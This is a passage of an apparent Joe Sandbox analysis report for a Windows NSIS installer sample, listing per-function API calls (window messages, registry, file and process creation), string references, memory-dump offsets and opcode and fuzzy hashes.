                                                                                                              • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                              • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                              • GetMessagePos.USER32 ref: 00404AA1
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                              • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                              • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                              • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                              • wsprintfW.USER32 ref: 00402D5D
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                              Strings
                                                                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-82062127
                                                                                                              • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                              • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                              • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                              • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                              • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                              • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                              • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                              • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                              • CharNextW.USER32(0040A300,0043F000,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                              • CharPrevW.USER32(0040A300,0040A300,75923420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                              • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                              • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                              • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                                • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                              • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                              • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                              • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                              • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                              • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                              • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                              • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                              • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                              • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                              • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                              • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                              • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • wsprintfW.USER32 ref: 00404A1A
                                                                                                              • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s
                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                              • Opcode ID: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                              • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                              • Opcode Fuzzy Hash: c2e87f168d66866e2d8dc5e8e8377fdf310bf379f9e84288a58d834ab05b21ed
                                                                                                              • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                              • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                              • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                              • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                              • wsprintfW.USER32 ref: 00406411
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll
                                                                                                              • API String ID: 2200240437-2744773210
                                                                                                              • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                              • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                              • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                              • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                              APIs
                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                              • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1356686001-0
                                                                                                              • Opcode ID: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                              • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                              • Opcode Fuzzy Hash: 8a072e14775335605bdd4e78a6bff533e78b893741e3763667742a47c04b4826
                                                                                                              • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668
                                                                                                              APIs
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3585118688-0
                                                                                                              • Opcode ID: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                              • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                              • Opcode Fuzzy Hash: 2fccfab20e6c6224511eae8da94d64daaac4a5ffd49f94ff9cc0495680f83f6b
                                                                                                              • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                              • GetLastError.KERNEL32 ref: 004056DA
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                              • GetLastError.KERNEL32 ref: 004056F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID:
                                                                                                              • API String ID: 3449924974-0
                                                                                                              • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                              • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                              • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                              • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                              • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3285321595.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3285304936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285341884.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285359778.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.3285386259.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                              • String ID:
                                                                                                              • API String ID: 2102729457-0
                                                                                                              • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                              • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
